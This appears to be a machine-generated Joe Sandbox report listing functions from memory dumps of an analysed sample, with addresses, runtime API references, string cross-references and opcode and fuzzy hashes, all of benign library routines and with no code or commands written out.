Source File: 00000002.00000002.1972631076.000001B630F60000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001B630F60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b630f60000_GR55Qg1hth.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: Tuesday$Wednesday$or copy constructor iterator'
API String ID: 3215553584-4202648911
Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
Instruction ID: 23167f491d3e9b6665773531ad765ea0a123cb5806978eea1eaba597c0e3d5e9
Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
Instruction Fuzzy Hash: 5A61CE7260024882FA69DB69E554FEA3AE1F7AE780F50452DCE0E177B5DB3EC84D8700

Function 000001B630F6A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001B630F6A1A0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000001B630F6A288

Strings

csm, xrefs: 000001B630F6A1C2
csm, xrefs: 000001B630F6A2DA

Memory Dump Source

Source File: 00000002.00000002.1972631076.000001B630F60000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001B630F60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b630f60000_GR55Qg1hth.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction ID: 3964148931290ba476289fe162760b5e4427535d89a4daa7973509179e3efcbb
Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction Fuzzy Hash: 52516E32204288CAEB648F259544B9977E0F369B94F18431EDE9D87BA5CB3FD499CF00

Function 000001B630F68405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001B630F68413
_IsNonwritableInCurrentImage.LIBCMT ref: 000001B630F684A8

Strings

csm, xrefs: 000001B630F6848E
f, xrefs: 000001B630F68426

Memory Dump Source

Source File: 00000002.00000002.1972631076.000001B630F60000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001B630F60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b630f60000_GR55Qg1hth.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
Instruction ID: 8c3da9e0587f978680cc4aa915e92a87e4c10184d4090a04f9f94ac6ac7b0b09
Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
Instruction Fuzzy Hash: 6A51B2327016048BEB14CB15E444F9937E5F368BA8F58822DDE1F437A8EB7ACC4A8704

Function 000001B630F683E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001B630F68413
_IsNonwritableInCurrentImage.LIBCMT ref: 000001B630F684A8

Strings

csm, xrefs: 000001B630F6848E
f, xrefs: 000001B630F68426

Memory Dump Source

Source File: 00000002.00000002.1972631076.000001B630F60000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001B630F60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b630f60000_GR55Qg1hth.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
Instruction ID: a8cbe21f0373ac90909c95a5607b7a928d8ce80ff420be00e84f2387ac46b2cb
Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
Instruction Fuzzy Hash: C7318A3220164497E714DB11E844BA977E4F368B98F09821CEE5F037A8DB3EC94AC704

Function 00007FF650233AC0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF650233AE8
GetCurrentThreadId.KERNEL32 ref: 00007FF650233B2A

Strings

T%p %d %s, xrefs: 00007FF650233AF3
T%p %d V=%0X H=%p %s, xrefs: 00007FF650233B4F

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: CurrentThread
String ID: T%p %d %s$T%p %d V=%0X H=%p %s
API String ID: 2882836952-2059990036
Opcode ID: 67f0619711882fb8c0885a03d3f557804ff1321dd50c7e9c0f78b0fdb08f2ed4
Instruction ID: c3d754201341912b95fec946e418ee7f9ca4dd0a73beaa6e43cb050164258f86
Opcode Fuzzy Hash: 67f0619711882fb8c0885a03d3f557804ff1321dd50c7e9c0f78b0fdb08f2ed4
Instruction Fuzzy Hash: 02014033B08607A6E6219B16E9014BA67A5BF8CB94F4C4135EE4CE7755DE3CE446CB40

Function 00007FF65022DFB0 Relevance: 6.3, APIs: 5, Instructions: 94stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF65022E03E
memcpy.MSVCRT ref: 00007FF65022E052
free.MSVCRT ref: 00007FF65022E05D

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: freememcpystrlen
String ID:
API String ID: 2208669145-0
Opcode ID: b366c3624a34b6328c43b6877c5c82287045cc84d1d7adc9d48f6e0e4c069e09
Instruction ID: b819a488ef1841cd27e1554c7415ed2aa66d67e1244cf355f71ddde29c243c7b
Opcode Fuzzy Hash: b366c3624a34b6328c43b6877c5c82287045cc84d1d7adc9d48f6e0e4c069e09
Instruction Fuzzy Hash: 0131D472A2864360FF615E529B1037B6A90BF447A8F0C4131DE4EBA3C4DFBCE6469600

Function 00007FF65023D140 Relevance: 6.3, APIs: 4, Instructions: 321COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF65023D231

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: d70349bc9c1524d26521fd65c4a458df4fb405ac5d07478a6779465ec2e0c7d3
Instruction ID: 8b31640040d8e6dba615892e93c284bdaf722bb75b247597b9d249c81ed7d343
Opcode Fuzzy Hash: d70349bc9c1524d26521fd65c4a458df4fb405ac5d07478a6779465ec2e0c7d3
Instruction Fuzzy Hash: 02C1E773E18A4366E7204A29A2013BA2EA1BF48B68F1C4235DE5DA77C5CE3CFD518741

Function 00007FF65023A590 Relevance: 6.3, APIs: 4, Instructions: 319COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF65023A681

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 346d97d3c0f16ec61348305e898cb21c60e62e2f68d204def2d18b4ac65c552e
Instruction ID: 6af446f3f792fb4051bad825e962cc1fa102be30e8f5fc1e4be247424c76cb54
Opcode Fuzzy Hash: 346d97d3c0f16ec61348305e898cb21c60e62e2f68d204def2d18b4ac65c552e
Instruction Fuzzy Hash: 19C1D677E1824366EB214A2986453BE6EA1BF18B68F1D4235CA1DB77C5CE3DF842C740

Function 00007FF65022D520 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 315stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF65022D5A3
strlen.MSVCRT ref: 00007FF65022D683
strlen.MSVCRT ref: 00007FF65022D6F8

Strings

_GLOBAL_, xrefs: 00007FF65022D557

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: strlen
String ID: _GLOBAL_
API String ID: 39653677-770460502
Opcode ID: 3700fe73c6d3e605f7d873da3646bfec28a4c554f7b500fea2f5946d5c8f7650
Instruction ID: 9c7cade9f74266f90ee2525afa7d8adf653b7d5b6795c4469a7f4700f16e92d0
Opcode Fuzzy Hash: 3700fe73c6d3e605f7d873da3646bfec28a4c554f7b500fea2f5946d5c8f7650
Instruction Fuzzy Hash: EED1E372A18AD7A9F7608BA19D043FE3FA1AB05798F484035DA8DAB789CF3CD545C740

Function 00007FF65023D680 Relevance: 6.2, APIs: 4, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2003478f90ec538c76f09482347ae3f7c76a6382b38b985e93f8e09ec77093db
Instruction ID: 67fd2549feff1fe2e8d3ebb2ae1df8e25bd12e399b6b13e4bc7e76a14f0df355
Opcode Fuzzy Hash: 2003478f90ec538c76f09482347ae3f7c76a6382b38b985e93f8e09ec77093db
Instruction Fuzzy Hash: D891A572E19A5366E7658F29A2043B96EA1BB08B94F5C8131CE0DA73C4DF3CF842C740

Function 00007FF65023AAD0 Relevance: 6.2, APIs: 4, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e6e5f4dbbebcdbe2464d60878269abd70efe3d9c16f3e99d452a50a930ed317
Instruction ID: 269b16ff16736dd403ff4dfe4ae70a21cebdefc6da107e57a0be8f54aaeac687
Opcode Fuzzy Hash: 3e6e5f4dbbebcdbe2464d60878269abd70efe3d9c16f3e99d452a50a930ed317
Instruction Fuzzy Hash: 48918472F0925796E7658F2982007B96EA1BB18B98F5C9632CE0DA77C5DF3CE841C740

Function 00007FF650249A00 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 192COMMON

Download Yara Rule

Strings

basic_string::_M_construct null not valid, xrefs: 00007FF650249A94, 00007FF650249B44, 00007FF650249BF4

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID:
String ID: basic_string::_M_construct null not valid
API String ID: 0-3522614731
Opcode ID: a5833ebf22b63d39d6e73767eddfec624db1c2a534896e8e1132fb8364345cb2
Instruction ID: 475c0a116d1797b76d558cd3fca5ef2417a644e4aeed6a43e2ed80f7ecfdae4b
Opcode Fuzzy Hash: a5833ebf22b63d39d6e73767eddfec624db1c2a534896e8e1132fb8364345cb2
Instruction Fuzzy Hash: C851E572A08B62A0EB21AB15E500179BBA0EB09BD4F5C4531DEDDAB795DE3CD942C700

Function 00007FF650248D50 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 165COMMON

Download Yara Rule

Strings

basic_string::_S_construct null not valid, xrefs: 00007FF650248EDA
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF650248D8C, 00007FF650248DEA, 00007FF650248E4A
basic_string::basic_string, xrefs: 00007FF650248D85, 00007FF650248DE3, 00007FF650248E43

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_S_construct null not valid$basic_string::basic_string
API String ID: 0-1533248280
Opcode ID: 69b0789b314b52825bb77d66b6d180235828afc0662c9bd68efef1e0263b7fea
Instruction ID: 73d244c74fb1a5bd85b9bdbcabbe5d68f717bbcbcddd5f7dcd4c2b53cd6ab465
Opcode Fuzzy Hash: 69b0789b314b52825bb77d66b6d180235828afc0662c9bd68efef1e0263b7fea
Instruction Fuzzy Hash: 754113B2F16647B1EF11AB62E5183BD6790AB64BC4F4C8031DE4C6B786EE2CD585C380

Function 00007FF650248730 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 165COMMON

Download Yara Rule

Strings

basic_string::_S_construct null not valid, xrefs: 00007FF6502488BA
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF65024876C, 00007FF6502487CA, 00007FF65024882A
basic_string::basic_string, xrefs: 00007FF650248765, 00007FF6502487C3, 00007FF650248823

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_S_construct null not valid$basic_string::basic_string
API String ID: 0-1533248280
Opcode ID: e28340071463f334725f87ad43f4c211ae9b0b6aa16a424defd9399211e07755
Instruction ID: 118e6b301dc337bed4594f2b9afbbad44ef7e15b86a29290e6455d8012b9e238
Opcode Fuzzy Hash: e28340071463f334725f87ad43f4c211ae9b0b6aa16a424defd9399211e07755
Instruction Fuzzy Hash: 3841F4B2F1664BB1FF119B62E5583BD66A19B64BC4F4C8031DE4C6B786EE2CD485C380

Function 00007FF65024BF20 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 161stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF65024BF85

Part of subcall function 00007FF65024ABD0: memcpy.MSVCRT ref: 00007FF65024AC75
Part of subcall function 00007FF65024ABD0: memcpy.MSVCRT ref: 00007FF65024ACA0

Strings

basic_string::replace, xrefs: 00007FF65024BF50, 00007FF65024BFB6, 00007FF65024BFF8, 00007FF65024C03C, 00007FF65024C0B7
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF65024BF57, 00007FF65024BFBD, 00007FF65024BFFF, 00007FF65024C043, 00007FF65024C0A5, 00007FF65024C0BE, 00007FF65024C103
basic_string::insert, xrefs: 00007FF65024C09E, 00007FF65024C0FC

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: memcpy$strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::insert$basic_string::replace
API String ID: 2619041689-3628603605
Opcode ID: 99168f70d61b67b2de2e857ca410546fd1f79683870880369f4542f5b3ce907c
Instruction ID: abba8c671cef64d420427954f72a9ccc3119394eedb19d480a6e791311d69a4d
Opcode Fuzzy Hash: 99168f70d61b67b2de2e857ca410546fd1f79683870880369f4542f5b3ce907c
Instruction Fuzzy Hash: E041F3B6A0AA87F1EA10EB66D8105A92760FB15BC8F884036ED4DB7755FE7CD186C700

Function 00007FF65024EC50 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 140COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF65024ECB5
memcpy.MSVCRT ref: 00007FF65024ED8A

Strings

basic_string::append, xrefs: 00007FF65024ED0D, 00007FF65024EDE9
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF65024ED14

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::append
API String ID: 3510742995-4063909124
Opcode ID: 41efe5dd4391930a206dfae007c65cfe8c29c96a2af1e7eb0a70ae8c621f8b0a
Instruction ID: 0eb28cf6509c29e651496bd717f442f7adf977cd12dc2af759ea76e5f91a907e
